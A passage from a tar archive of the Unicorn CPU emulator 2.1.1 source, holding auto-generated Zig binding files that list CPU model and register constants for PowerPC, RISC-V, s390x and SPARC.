CPU_PPC32_MPC8533_V10 = 95, CPU_PPC32_MPC8533_V11 = 96, CPU_PPC32_MPC8533E_V10 = 97, CPU_PPC32_MPC8533E_V11 = 98, CPU_PPC32_MPC8540_V10 = 99, CPU_PPC32_MPC8540_V20 = 100, CPU_PPC32_MPC8540_V21 = 101, CPU_PPC32_MPC8541_V10 = 102, CPU_PPC32_MPC8541_V11 = 103, CPU_PPC32_MPC8541E_V10 = 104, CPU_PPC32_MPC8541E_V11 = 105, CPU_PPC32_MPC8543_V10 = 106, CPU_PPC32_MPC8543_V11 = 107, CPU_PPC32_MPC8543_V20 = 108, CPU_PPC32_MPC8543_V21 = 109, CPU_PPC32_MPC8543E_V10 = 110, CPU_PPC32_MPC8543E_V11 = 111, CPU_PPC32_MPC8543E_V20 = 112, CPU_PPC32_MPC8543E_V21 = 113, CPU_PPC32_MPC8544_V10 = 114, CPU_PPC32_MPC8544_V11 = 115, CPU_PPC32_MPC8544E_V10 = 116, CPU_PPC32_MPC8544E_V11 = 117, CPU_PPC32_MPC8545_V20 = 118, CPU_PPC32_MPC8545_V21 = 119, CPU_PPC32_MPC8545E_V20 = 120, CPU_PPC32_MPC8545E_V21 = 121, CPU_PPC32_MPC8547E_V20 = 122, CPU_PPC32_MPC8547E_V21 = 123, CPU_PPC32_MPC8548_V10 = 124, CPU_PPC32_MPC8548_V11 = 125, CPU_PPC32_MPC8548_V20 = 126, CPU_PPC32_MPC8548_V21 = 127, CPU_PPC32_MPC8548E_V10 = 128, CPU_PPC32_MPC8548E_V11 = 129, CPU_PPC32_MPC8548E_V20 = 130, CPU_PPC32_MPC8548E_V21 = 131, CPU_PPC32_MPC8555_V10 = 132, CPU_PPC32_MPC8555_V11 = 133, CPU_PPC32_MPC8555E_V10 = 134, CPU_PPC32_MPC8555E_V11 = 135, CPU_PPC32_MPC8560_V10 = 136, CPU_PPC32_MPC8560_V20 = 137, CPU_PPC32_MPC8560_V21 = 138, CPU_PPC32_MPC8567 = 139, CPU_PPC32_MPC8567E = 140, CPU_PPC32_MPC8568 = 141, CPU_PPC32_MPC8568E = 142, CPU_PPC32_MPC8572 = 143, CPU_PPC32_MPC8572E = 144, CPU_PPC32_E600 = 145, CPU_PPC32_MPC8610 = 146, CPU_PPC32_MPC8641 = 147, CPU_PPC32_MPC8641D = 148, CPU_PPC32_601_V0 = 149, CPU_PPC32_601_V1 = 150, CPU_PPC32_601_V2 = 151, CPU_PPC32_602 = 152, CPU_PPC32_603 = 153, CPU_PPC32_603E_V1_1 = 154, CPU_PPC32_603E_V1_2 = 155, CPU_PPC32_603E_V1_3 = 156, CPU_PPC32_603E_V1_4 = 157, CPU_PPC32_603E_V2_2 = 158, CPU_PPC32_603E_V3 = 159, CPU_PPC32_603E_V4 = 160, CPU_PPC32_603E_V4_1 = 161, CPU_PPC32_603E7 = 162, CPU_PPC32_603E7T = 163, CPU_PPC32_603E7V = 164, CPU_PPC32_603E7V1 = 165, CPU_PPC32_603E7V2 = 166, CPU_PPC32_603P = 167, CPU_PPC32_604 = 168, CPU_PPC32_604E_V1_0 = 169, CPU_PPC32_604E_V2_2 = 170, CPU_PPC32_604E_V2_4 = 171, CPU_PPC32_604R = 172, CPU_PPC32_740_V1_0 = 173, CPU_PPC32_750_V1_0 = 174, CPU_PPC32_740_V2_0 = 175, CPU_PPC32_750_V2_0 = 176, CPU_PPC32_740_V2_1 = 177, CPU_PPC32_750_V2_1 = 178, CPU_PPC32_740_V2_2 = 179, CPU_PPC32_750_V2_2 = 180, CPU_PPC32_740_V3_0 = 181, CPU_PPC32_750_V3_0 = 182, CPU_PPC32_740_V3_1 = 183, CPU_PPC32_750_V3_1 = 184, CPU_PPC32_740E = 185, CPU_PPC32_750E = 186, CPU_PPC32_740P = 187, CPU_PPC32_750P = 188, CPU_PPC32_750CL_V1_0 = 189, CPU_PPC32_750CL_V2_0 = 190, CPU_PPC32_750CX_V1_0 = 191, CPU_PPC32_750CX_V2_0 = 192, CPU_PPC32_750CX_V2_1 = 193, CPU_PPC32_750CX_V2_2 = 194, CPU_PPC32_750CXE_V2_1 = 195, CPU_PPC32_750CXE_V2_2 = 196, CPU_PPC32_750CXE_V2_3 = 197, CPU_PPC32_750CXE_V2_4 = 198, CPU_PPC32_750CXE_V2_4B = 199, CPU_PPC32_750CXE_V3_0 = 200, CPU_PPC32_750CXE_V3_1 = 201, CPU_PPC32_750CXE_V3_1B = 202, CPU_PPC32_750CXR = 203, CPU_PPC32_750FL = 204, CPU_PPC32_750FX_V1_0 = 205, CPU_PPC32_750FX_V2_0 = 206, CPU_PPC32_750FX_V2_1 = 207, CPU_PPC32_750FX_V2_2 = 208, CPU_PPC32_750FX_V2_3 = 209, CPU_PPC32_750GL = 210, CPU_PPC32_750GX_V1_0 = 211, CPU_PPC32_750GX_V1_1 = 212, CPU_PPC32_750GX_V1_2 = 213, CPU_PPC32_750L_V2_0 = 214, CPU_PPC32_750L_V2_1 = 215, CPU_PPC32_750L_V2_2 = 216, CPU_PPC32_750L_V3_0 = 217, CPU_PPC32_750L_V3_2 = 218, CPU_PPC32_745_V1_0 = 219, CPU_PPC32_755_V1_0 = 220, CPU_PPC32_745_V1_1 = 221, CPU_PPC32_755_V1_1 = 222, CPU_PPC32_745_V2_0 = 223, CPU_PPC32_755_V2_0 = 224, CPU_PPC32_745_V2_1 = 225, CPU_PPC32_755_V2_1 = 226, CPU_PPC32_745_V2_2 = 227, CPU_PPC32_755_V2_2 = 228, CPU_PPC32_745_V2_3 = 229, CPU_PPC32_755_V2_3 = 230, CPU_PPC32_745_V2_4 = 231, CPU_PPC32_755_V2_4 = 232, CPU_PPC32_745_V2_5 = 233, CPU_PPC32_755_V2_5 = 234, CPU_PPC32_745_V2_6 = 235, CPU_PPC32_755_V2_6 = 236, CPU_PPC32_745_V2_7 = 237, CPU_PPC32_755_V2_7 = 238, CPU_PPC32_745_V2_8 = 239, CPU_PPC32_755_V2_8 = 240, CPU_PPC32_7400_V1_0 = 241, CPU_PPC32_7400_V1_1 = 242, CPU_PPC32_7400_V2_0 = 243, CPU_PPC32_7400_V2_1 = 244, CPU_PPC32_7400_V2_2 = 245, CPU_PPC32_7400_V2_6 = 246, CPU_PPC32_7400_V2_7 = 247, CPU_PPC32_7400_V2_8 = 248, CPU_PPC32_7400_V2_9 = 249, CPU_PPC32_7410_V1_0 = 250, CPU_PPC32_7410_V1_1 = 251, CPU_PPC32_7410_V1_2 = 252, CPU_PPC32_7410_V1_3 = 253, CPU_PPC32_7410_V1_4 = 254, CPU_PPC32_7448_V1_0 = 255, CPU_PPC32_7448_V1_1 = 256, CPU_PPC32_7448_V2_0 = 257, CPU_PPC32_7448_V2_1 = 258, CPU_PPC32_7450_V1_0 = 259, CPU_PPC32_7450_V1_1 = 260, CPU_PPC32_7450_V1_2 = 261, CPU_PPC32_7450_V2_0 = 262, CPU_PPC32_7450_V2_1 = 263, CPU_PPC32_7441_V2_1 = 264, CPU_PPC32_7441_V2_3 = 265, CPU_PPC32_7451_V2_3 = 266, CPU_PPC32_7441_V2_10 = 267, CPU_PPC32_7451_V2_10 = 268, CPU_PPC32_7445_V1_0 = 269, CPU_PPC32_7455_V1_0 = 270, CPU_PPC32_7445_V2_1 = 271, CPU_PPC32_7455_V2_1 = 272, CPU_PPC32_7445_V3_2 = 273, CPU_PPC32_7455_V3_2 = 274, CPU_PPC32_7445_V3_3 = 275, CPU_PPC32_7455_V3_3 = 276, CPU_PPC32_7445_V3_4 = 277, CPU_PPC32_7455_V3_4 = 278, CPU_PPC32_7447_V1_0 = 279, CPU_PPC32_7457_V1_0 = 280, CPU_PPC32_7447_V1_1 = 281, CPU_PPC32_7457_V1_1 = 282, CPU_PPC32_7457_V1_2 = 283, CPU_PPC32_7447A_V1_0 = 284, CPU_PPC32_7457A_V1_0 = 285, CPU_PPC32_7447A_V1_1 = 286, CPU_PPC32_7457A_V1_1 = 287, CPU_PPC32_7447A_V1_2 = 288, CPU_PPC32_7457A_V1_2 = 289, CPU_PPC32_ENDING = 290, // PPC64 CPU CPU_PPC64_E5500 = 0, CPU_PPC64_E6500 = 1, CPU_PPC64_970_V2_2 = 2, CPU_PPC64_970FX_V1_0 = 3, CPU_PPC64_970FX_V2_0 = 4, CPU_PPC64_970FX_V2_1 = 5, CPU_PPC64_970FX_V3_0 = 6, CPU_PPC64_970FX_V3_1 = 7, CPU_PPC64_970MP_V1_0 = 8, CPU_PPC64_970MP_V1_1 = 9, CPU_PPC64_POWER5_V2_1 = 10, CPU_PPC64_POWER7_V2_3 = 11, CPU_PPC64_POWER7_V2_1 = 12, CPU_PPC64_POWER8E_V2_1 = 13, CPU_PPC64_POWER8_V2_0 = 14, CPU_PPC64_POWER8NVL_V1_0 = 15, CPU_PPC64_POWER9_V1_0 = 16, CPU_PPC64_POWER9_V2_0 = 17, CPU_PPC64_POWER10_V1_0 = 18, CPU_PPC64_ENDING = 19, // PPC registers PPC_REG_INVALID = 0, // General purpose registers PPC_REG_PC = 1, PPC_REG_0 = 2, PPC_REG_1 = 3, PPC_REG_2 = 4, PPC_REG_3 = 5, PPC_REG_4 = 6, PPC_REG_5 = 7, PPC_REG_6 = 8, PPC_REG_7 = 9, PPC_REG_8 = 10, PPC_REG_9 = 11, PPC_REG_10 = 12, PPC_REG_11 = 13, PPC_REG_12 = 14, PPC_REG_13 = 15, PPC_REG_14 = 16, PPC_REG_15 = 17, PPC_REG_16 = 18, PPC_REG_17 = 19, PPC_REG_18 = 20, PPC_REG_19 = 21, PPC_REG_20 = 22, PPC_REG_21 = 23, PPC_REG_22 = 24, PPC_REG_23 = 25, PPC_REG_24 = 26, PPC_REG_25 = 27, PPC_REG_26 = 28, PPC_REG_27 = 29, PPC_REG_28 = 30, PPC_REG_29 = 31, PPC_REG_30 = 32, PPC_REG_31 = 33, PPC_REG_CR0 = 34, PPC_REG_CR1 = 35, PPC_REG_CR2 = 36, PPC_REG_CR3 = 37, PPC_REG_CR4 = 38, PPC_REG_CR5 = 39, PPC_REG_CR6 = 40, PPC_REG_CR7 = 41, PPC_REG_FPR0 = 42, PPC_REG_FPR1 = 43, PPC_REG_FPR2 = 44, PPC_REG_FPR3 = 45, PPC_REG_FPR4 = 46, PPC_REG_FPR5 = 47, PPC_REG_FPR6 = 48, PPC_REG_FPR7 = 49, PPC_REG_FPR8 = 50, PPC_REG_FPR9 = 51, PPC_REG_FPR10 = 52, PPC_REG_FPR11 = 53, PPC_REG_FPR12 = 54, PPC_REG_FPR13 = 55, PPC_REG_FPR14 = 56, PPC_REG_FPR15 = 57, PPC_REG_FPR16 = 58, PPC_REG_FPR17 = 59, PPC_REG_FPR18 = 60, PPC_REG_FPR19 = 61, PPC_REG_FPR20 = 62, PPC_REG_FPR21 = 63, PPC_REG_FPR22 = 64, PPC_REG_FPR23 = 65, PPC_REG_FPR24 = 66, PPC_REG_FPR25 = 67, PPC_REG_FPR26 = 68, PPC_REG_FPR27 = 69, PPC_REG_FPR28 = 70, PPC_REG_FPR29 = 71, PPC_REG_FPR30 = 72, PPC_REG_FPR31 = 73, PPC_REG_LR = 74, PPC_REG_XER = 75, PPC_REG_CTR = 76, PPC_REG_MSR = 77, PPC_REG_FPSCR = 78, PPC_REG_CR = 79, PPC_REG_ENDING = 80, }; ������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/riscv_const.zig��������������������������������������������������0000664�0000000�0000000�00000015106�14675241067�0022321�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const riscvConst = enum(c_int) { // RISCV32 CPU CPU_RISCV32_ANY = 0, CPU_RISCV32_BASE32 = 1, CPU_RISCV32_SIFIVE_E31 = 2, CPU_RISCV32_SIFIVE_U34 = 3, CPU_RISCV32_ENDING = 4, // RISCV64 CPU CPU_RISCV64_ANY = 0, CPU_RISCV64_BASE64 = 1, CPU_RISCV64_SIFIVE_E51 = 2, CPU_RISCV64_SIFIVE_U54 = 3, CPU_RISCV64_ENDING = 4, // RISCV registers RISCV_REG_INVALID = 0, // General purpose registers RISCV_REG_X0 = 1, RISCV_REG_X1 = 2, RISCV_REG_X2 = 3, RISCV_REG_X3 = 4, RISCV_REG_X4 = 5, RISCV_REG_X5 = 6, RISCV_REG_X6 = 7, RISCV_REG_X7 = 8, RISCV_REG_X8 = 9, RISCV_REG_X9 = 10, RISCV_REG_X10 = 11, RISCV_REG_X11 = 12, RISCV_REG_X12 = 13, RISCV_REG_X13 = 14, RISCV_REG_X14 = 15, RISCV_REG_X15 = 16, RISCV_REG_X16 = 17, RISCV_REG_X17 = 18, RISCV_REG_X18 = 19, RISCV_REG_X19 = 20, RISCV_REG_X20 = 21, RISCV_REG_X21 = 22, RISCV_REG_X22 = 23, RISCV_REG_X23 = 24, RISCV_REG_X24 = 25, RISCV_REG_X25 = 26, RISCV_REG_X26 = 27, RISCV_REG_X27 = 28, RISCV_REG_X28 = 29, RISCV_REG_X29 = 30, RISCV_REG_X30 = 31, RISCV_REG_X31 = 32, // RISCV CSR RISCV_REG_USTATUS = 33, RISCV_REG_UIE = 34, RISCV_REG_UTVEC = 35, RISCV_REG_USCRATCH = 36, RISCV_REG_UEPC = 37, RISCV_REG_UCAUSE = 38, RISCV_REG_UTVAL = 39, RISCV_REG_UIP = 40, RISCV_REG_FFLAGS = 41, RISCV_REG_FRM = 42, RISCV_REG_FCSR = 43, RISCV_REG_CYCLE = 44, RISCV_REG_TIME = 45, RISCV_REG_INSTRET = 46, RISCV_REG_HPMCOUNTER3 = 47, RISCV_REG_HPMCOUNTER4 = 48, RISCV_REG_HPMCOUNTER5 = 49, RISCV_REG_HPMCOUNTER6 = 50, RISCV_REG_HPMCOUNTER7 = 51, RISCV_REG_HPMCOUNTER8 = 52, RISCV_REG_HPMCOUNTER9 = 53, RISCV_REG_HPMCOUNTER10 = 54, RISCV_REG_HPMCOUNTER11 = 55, RISCV_REG_HPMCOUNTER12 = 56, RISCV_REG_HPMCOUNTER13 = 57, RISCV_REG_HPMCOUNTER14 = 58, RISCV_REG_HPMCOUNTER15 = 59, RISCV_REG_HPMCOUNTER16 = 60, RISCV_REG_HPMCOUNTER17 = 61, RISCV_REG_HPMCOUNTER18 = 62, RISCV_REG_HPMCOUNTER19 = 63, RISCV_REG_HPMCOUNTER20 = 64, RISCV_REG_HPMCOUNTER21 = 65, RISCV_REG_HPMCOUNTER22 = 66, RISCV_REG_HPMCOUNTER23 = 67, RISCV_REG_HPMCOUNTER24 = 68, RISCV_REG_HPMCOUNTER25 = 69, RISCV_REG_HPMCOUNTER26 = 70, RISCV_REG_HPMCOUNTER27 = 71, RISCV_REG_HPMCOUNTER28 = 72, RISCV_REG_HPMCOUNTER29 = 73, RISCV_REG_HPMCOUNTER30 = 74, RISCV_REG_HPMCOUNTER31 = 75, RISCV_REG_CYCLEH = 76, RISCV_REG_TIMEH = 77, RISCV_REG_INSTRETH = 78, RISCV_REG_HPMCOUNTER3H = 79, RISCV_REG_HPMCOUNTER4H = 80, RISCV_REG_HPMCOUNTER5H = 81, RISCV_REG_HPMCOUNTER6H = 82, RISCV_REG_HPMCOUNTER7H = 83, RISCV_REG_HPMCOUNTER8H = 84, RISCV_REG_HPMCOUNTER9H = 85, RISCV_REG_HPMCOUNTER10H = 86, RISCV_REG_HPMCOUNTER11H = 87, RISCV_REG_HPMCOUNTER12H = 88, RISCV_REG_HPMCOUNTER13H = 89, RISCV_REG_HPMCOUNTER14H = 90, RISCV_REG_HPMCOUNTER15H = 91, RISCV_REG_HPMCOUNTER16H = 92, RISCV_REG_HPMCOUNTER17H = 93, RISCV_REG_HPMCOUNTER18H = 94, RISCV_REG_HPMCOUNTER19H = 95, RISCV_REG_HPMCOUNTER20H = 96, RISCV_REG_HPMCOUNTER21H = 97, RISCV_REG_HPMCOUNTER22H = 98, RISCV_REG_HPMCOUNTER23H = 99, RISCV_REG_HPMCOUNTER24H = 100, RISCV_REG_HPMCOUNTER25H = 101, RISCV_REG_HPMCOUNTER26H = 102, RISCV_REG_HPMCOUNTER27H = 103, RISCV_REG_HPMCOUNTER28H = 104, RISCV_REG_HPMCOUNTER29H = 105, RISCV_REG_HPMCOUNTER30H = 106, RISCV_REG_HPMCOUNTER31H = 107, RISCV_REG_MCYCLE = 108, RISCV_REG_MINSTRET = 109, RISCV_REG_MCYCLEH = 110, RISCV_REG_MINSTRETH = 111, RISCV_REG_MVENDORID = 112, RISCV_REG_MARCHID = 113, RISCV_REG_MIMPID = 114, RISCV_REG_MHARTID = 115, RISCV_REG_MSTATUS = 116, RISCV_REG_MISA = 117, RISCV_REG_MEDELEG = 118, RISCV_REG_MIDELEG = 119, RISCV_REG_MIE = 120, RISCV_REG_MTVEC = 121, RISCV_REG_MCOUNTEREN = 122, RISCV_REG_MSTATUSH = 123, RISCV_REG_MUCOUNTEREN = 124, RISCV_REG_MSCOUNTEREN = 125, RISCV_REG_MHCOUNTEREN = 126, RISCV_REG_MSCRATCH = 127, RISCV_REG_MEPC = 128, RISCV_REG_MCAUSE = 129, RISCV_REG_MTVAL = 130, RISCV_REG_MIP = 131, RISCV_REG_MBADADDR = 132, RISCV_REG_SSTATUS = 133, RISCV_REG_SEDELEG = 134, RISCV_REG_SIDELEG = 135, RISCV_REG_SIE = 136, RISCV_REG_STVEC = 137, RISCV_REG_SCOUNTEREN = 138, RISCV_REG_SSCRATCH = 139, RISCV_REG_SEPC = 140, RISCV_REG_SCAUSE = 141, RISCV_REG_STVAL = 142, RISCV_REG_SIP = 143, RISCV_REG_SBADADDR = 144, RISCV_REG_SPTBR = 145, RISCV_REG_SATP = 146, RISCV_REG_HSTATUS = 147, RISCV_REG_HEDELEG = 148, RISCV_REG_HIDELEG = 149, RISCV_REG_HIE = 150, RISCV_REG_HCOUNTEREN = 151, RISCV_REG_HTVAL = 152, RISCV_REG_HIP = 153, RISCV_REG_HTINST = 154, RISCV_REG_HGATP = 155, RISCV_REG_HTIMEDELTA = 156, RISCV_REG_HTIMEDELTAH = 157, // Floating-point registers RISCV_REG_F0 = 158, RISCV_REG_F1 = 159, RISCV_REG_F2 = 160, RISCV_REG_F3 = 161, RISCV_REG_F4 = 162, RISCV_REG_F5 = 163, RISCV_REG_F6 = 164, RISCV_REG_F7 = 165, RISCV_REG_F8 = 166, RISCV_REG_F9 = 167, RISCV_REG_F10 = 168, RISCV_REG_F11 = 169, RISCV_REG_F12 = 170, RISCV_REG_F13 = 171, RISCV_REG_F14 = 172, RISCV_REG_F15 = 173, RISCV_REG_F16 = 174, RISCV_REG_F17 = 175, RISCV_REG_F18 = 176, RISCV_REG_F19 = 177, RISCV_REG_F20 = 178, RISCV_REG_F21 = 179, RISCV_REG_F22 = 180, RISCV_REG_F23 = 181, RISCV_REG_F24 = 182, RISCV_REG_F25 = 183, RISCV_REG_F26 = 184, RISCV_REG_F27 = 185, RISCV_REG_F28 = 186, RISCV_REG_F29 = 187, RISCV_REG_F30 = 188, RISCV_REG_F31 = 189, RISCV_REG_PC = 190, RISCV_REG_ENDING = 191, // Alias registers RISCV_REG_ZERO = 1, RISCV_REG_RA = 2, RISCV_REG_SP = 3, RISCV_REG_GP = 4, RISCV_REG_TP = 5, RISCV_REG_T0 = 6, RISCV_REG_T1 = 7, RISCV_REG_T2 = 8, RISCV_REG_S0 = 9, RISCV_REG_FP = 9, RISCV_REG_S1 = 10, RISCV_REG_A0 = 11, RISCV_REG_A1 = 12, RISCV_REG_A2 = 13, RISCV_REG_A3 = 14, RISCV_REG_A4 = 15, RISCV_REG_A5 = 16, RISCV_REG_A6 = 17, RISCV_REG_A7 = 18, RISCV_REG_S2 = 19, RISCV_REG_S3 = 20, RISCV_REG_S4 = 21, RISCV_REG_S5 = 22, RISCV_REG_S6 = 23, RISCV_REG_S7 = 24, RISCV_REG_S8 = 25, RISCV_REG_S9 = 26, RISCV_REG_S10 = 27, RISCV_REG_S11 = 28, RISCV_REG_T3 = 29, RISCV_REG_T4 = 30, RISCV_REG_T5 = 31, RISCV_REG_T6 = 32, RISCV_REG_FT0 = 158, RISCV_REG_FT1 = 159, RISCV_REG_FT2 = 160, RISCV_REG_FT3 = 161, RISCV_REG_FT4 = 162, RISCV_REG_FT5 = 163, RISCV_REG_FT6 = 164, RISCV_REG_FT7 = 165, RISCV_REG_FS0 = 166, RISCV_REG_FS1 = 167, RISCV_REG_FA0 = 168, RISCV_REG_FA1 = 169, RISCV_REG_FA2 = 170, RISCV_REG_FA3 = 171, RISCV_REG_FA4 = 172, RISCV_REG_FA5 = 173, RISCV_REG_FA6 = 174, RISCV_REG_FA7 = 175, RISCV_REG_FS2 = 176, RISCV_REG_FS3 = 177, RISCV_REG_FS4 = 178, RISCV_REG_FS5 = 179, RISCV_REG_FS6 = 180, RISCV_REG_FS7 = 181, RISCV_REG_FS8 = 182, RISCV_REG_FS9 = 183, RISCV_REG_FS10 = 184, RISCV_REG_FS11 = 185, RISCV_REG_FT8 = 186, RISCV_REG_FT9 = 187, RISCV_REG_FT10 = 188, RISCV_REG_FT11 = 189, }; ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/zig/unicorn/s390x_const.zig��������������������������������������������������0000664�0000000�0000000�00000004734�14675241067�0022066�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const s390xConst = enum(c_int) { // S390X CPU CPU_S390X_Z900 = 0, CPU_S390X_Z900_2 = 1, CPU_S390X_Z900_3 = 2, CPU_S390X_Z800 = 3, CPU_S390X_Z990 = 4, CPU_S390X_Z990_2 = 5, CPU_S390X_Z990_3 = 6, CPU_S390X_Z890 = 7, CPU_S390X_Z990_4 = 8, CPU_S390X_Z890_2 = 9, CPU_S390X_Z990_5 = 10, CPU_S390X_Z890_3 = 11, CPU_S390X_Z9EC = 12, CPU_S390X_Z9EC_2 = 13, CPU_S390X_Z9BC = 14, CPU_S390X_Z9EC_3 = 15, CPU_S390X_Z9BC_2 = 16, CPU_S390X_Z10EC = 17, CPU_S390X_Z10EC_2 = 18, CPU_S390X_Z10BC = 19, CPU_S390X_Z10EC_3 = 20, CPU_S390X_Z10BC_2 = 21, CPU_S390X_Z196 = 22, CPU_S390X_Z196_2 = 23, CPU_S390X_Z114 = 24, CPU_S390X_ZEC12 = 25, CPU_S390X_ZEC12_2 = 26, CPU_S390X_ZBC12 = 27, CPU_S390X_Z13 = 28, CPU_S390X_Z13_2 = 29, CPU_S390X_Z13S = 30, CPU_S390X_Z14 = 31, CPU_S390X_Z14_2 = 32, CPU_S390X_Z14ZR1 = 33, CPU_S390X_GEN15A = 34, CPU_S390X_GEN15B = 35, CPU_S390X_QEMU = 36, CPU_S390X_MAX = 37, CPU_S390X_ENDING = 38, // S390X registers S390X_REG_INVALID = 0, // General purpose registers S390X_REG_R0 = 1, S390X_REG_R1 = 2, S390X_REG_R2 = 3, S390X_REG_R3 = 4, S390X_REG_R4 = 5, S390X_REG_R5 = 6, S390X_REG_R6 = 7, S390X_REG_R7 = 8, S390X_REG_R8 = 9, S390X_REG_R9 = 10, S390X_REG_R10 = 11, S390X_REG_R11 = 12, S390X_REG_R12 = 13, S390X_REG_R13 = 14, S390X_REG_R14 = 15, S390X_REG_R15 = 16, // Floating point registers S390X_REG_F0 = 17, S390X_REG_F1 = 18, S390X_REG_F2 = 19, S390X_REG_F3 = 20, S390X_REG_F4 = 21, S390X_REG_F5 = 22, S390X_REG_F6 = 23, S390X_REG_F7 = 24, S390X_REG_F8 = 25, S390X_REG_F9 = 26, S390X_REG_F10 = 27, S390X_REG_F11 = 28, S390X_REG_F12 = 29, S390X_REG_F13 = 30, S390X_REG_F14 = 31, S390X_REG_F15 = 32, S390X_REG_F16 = 33, S390X_REG_F17 = 34, S390X_REG_F18 = 35, S390X_REG_F19 = 36, S390X_REG_F20 = 37, S390X_REG_F21 = 38, S390X_REG_F22 = 39, S390X_REG_F23 = 40, S390X_REG_F24 = 41, S390X_REG_F25 = 42, S390X_REG_F26 = 43, S390X_REG_F27 = 44, S390X_REG_F28 = 45, S390X_REG_F29 = 46, S390X_REG_F30 = 47, S390X_REG_F31 = 48, // Access registers S390X_REG_A0 = 49, S390X_REG_A1 = 50, S390X_REG_A2 = 51, S390X_REG_A3 = 52, S390X_REG_A4 = 53, S390X_REG_A5 = 54, S390X_REG_A6 = 55, S390X_REG_A7 = 56, S390X_REG_A8 = 57, S390X_REG_A9 = 58, S390X_REG_A10 = 59, S390X_REG_A11 = 60, S390X_REG_A12 = 61, S390X_REG_A13 = 62, S390X_REG_A14 = 63, S390X_REG_A15 = 64, S390X_REG_PC = 65, S390X_REG_PSWM = 66, S390X_REG_ENDING = 67, // Alias registers }; ������������������������������������unicorn-2.1.1/bindings/zig/unicorn/sparc_const.zig��������������������������������������������������0000664�0000000�0000000�00000006071�14675241067�0022304�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT pub const sparcConst = enum(c_int) { // SPARC32 CPU CPU_SPARC32_FUJITSU_MB86904 = 0, CPU_SPARC32_FUJITSU_MB86907 = 1, CPU_SPARC32_TI_MICROSPARC_I = 2, CPU_SPARC32_TI_MICROSPARC_II = 3, CPU_SPARC32_TI_MICROSPARC_IIEP = 4, CPU_SPARC32_TI_SUPERSPARC_40 = 5, CPU_SPARC32_TI_SUPERSPARC_50 = 6, CPU_SPARC32_TI_SUPERSPARC_51 = 7, CPU_SPARC32_TI_SUPERSPARC_60 = 8, CPU_SPARC32_TI_SUPERSPARC_61 = 9, CPU_SPARC32_TI_SUPERSPARC_II = 10, CPU_SPARC32_LEON2 = 11, CPU_SPARC32_LEON3 = 12, CPU_SPARC32_ENDING = 13, // SPARC64 CPU CPU_SPARC64_FUJITSU = 0, CPU_SPARC64_FUJITSU_III = 1, CPU_SPARC64_FUJITSU_IV = 2, CPU_SPARC64_FUJITSU_V = 3, CPU_SPARC64_TI_ULTRASPARC_I = 4, CPU_SPARC64_TI_ULTRASPARC_II = 5, CPU_SPARC64_TI_ULTRASPARC_III = 6, CPU_SPARC64_TI_ULTRASPARC_IIE = 7, CPU_SPARC64_SUN_ULTRASPARC_III = 8, CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9, CPU_SPARC64_SUN_ULTRASPARC_IIII = 10, CPU_SPARC64_SUN_ULTRASPARC_IV = 11, CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12, CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13, CPU_SPARC64_SUN_ULTRASPARC_T1 = 14, CPU_SPARC64_SUN_ULTRASPARC_T2 = 15, CPU_SPARC64_NEC_ULTRASPARC_I = 16, CPU_SPARC64_ENDING = 17, // SPARC registers SPARC_REG_INVALID = 0, SPARC_REG_F0 = 1, SPARC_REG_F1 = 2, SPARC_REG_F2 = 3, SPARC_REG_F3 = 4, SPARC_REG_F4 = 5, SPARC_REG_F5 = 6, SPARC_REG_F6 = 7, SPARC_REG_F7 = 8, SPARC_REG_F8 = 9, SPARC_REG_F9 = 10, SPARC_REG_F10 = 11, SPARC_REG_F11 = 12, SPARC_REG_F12 = 13, SPARC_REG_F13 = 14, SPARC_REG_F14 = 15, SPARC_REG_F15 = 16, SPARC_REG_F16 = 17, SPARC_REG_F17 = 18, SPARC_REG_F18 = 19, SPARC_REG_F19 = 20, SPARC_REG_F20 = 21, SPARC_REG_F21 = 22, SPARC_REG_F22 = 23, SPARC_REG_F23 = 24, SPARC_REG_F24 = 25, SPARC_REG_F25 = 26, SPARC_REG_F26 = 27, SPARC_REG_F27 = 28, SPARC_REG_F28 = 29, SPARC_REG_F29 = 30, SPARC_REG_F30 = 31, SPARC_REG_F31 = 32, SPARC_REG_F32 = 33, SPARC_REG_F34 = 34, SPARC_REG_F36 = 35, SPARC_REG_F38 = 36, SPARC_REG_F40 = 37, SPARC_REG_F42 = 38, SPARC_REG_F44 = 39, SPARC_REG_F46 = 40, SPARC_REG_F48 = 41, SPARC_REG_F50 = 42, SPARC_REG_F52 = 43, SPARC_REG_F54 = 44, SPARC_REG_F56 = 45, SPARC_REG_F58 = 46, SPARC_REG_F60 = 47, SPARC_REG_F62 = 48, SPARC_REG_FCC0 = 49, SPARC_REG_FCC1 = 50, SPARC_REG_FCC2 = 51, SPARC_REG_FCC3 = 52, SPARC_REG_G0 = 53, SPARC_REG_G1 = 54, SPARC_REG_G2 = 55, SPARC_REG_G3 = 56, SPARC_REG_G4 = 57, SPARC_REG_G5 = 58, SPARC_REG_G6 = 59, SPARC_REG_G7 = 60, SPARC_REG_I0 = 61, SPARC_REG_I1 = 62, SPARC_REG_I2 = 63, SPARC_REG_I3 = 64, SPARC_REG_I4 = 65, SPARC_REG_I5 = 66, SPARC_REG_FP = 67, SPARC_REG_I7 = 68, SPARC_REG_ICC = 69, SPARC_REG_L0 = 70, SPARC_REG_L1 = 71, SPARC_REG_L2 = 72, SPARC_REG_L3 = 73, SPARC_REG_L4 = 74, SPARC_REG_L5 = 75, SPARC_REG_L6 = 76, SPARC_REG_L7 = 77, SPARC_REG_O0 = 78, SPARC_REG_O1 = 79, SPARC_REG_O2 = 80, SPARC_REG_O3 = 81, SPARC_REG_O4 = 82, SPARC_REG_O5 = 83, SPARC_REG_SP = 84, SPARC_REG_O7 = 85, SPARC_REG_Y = 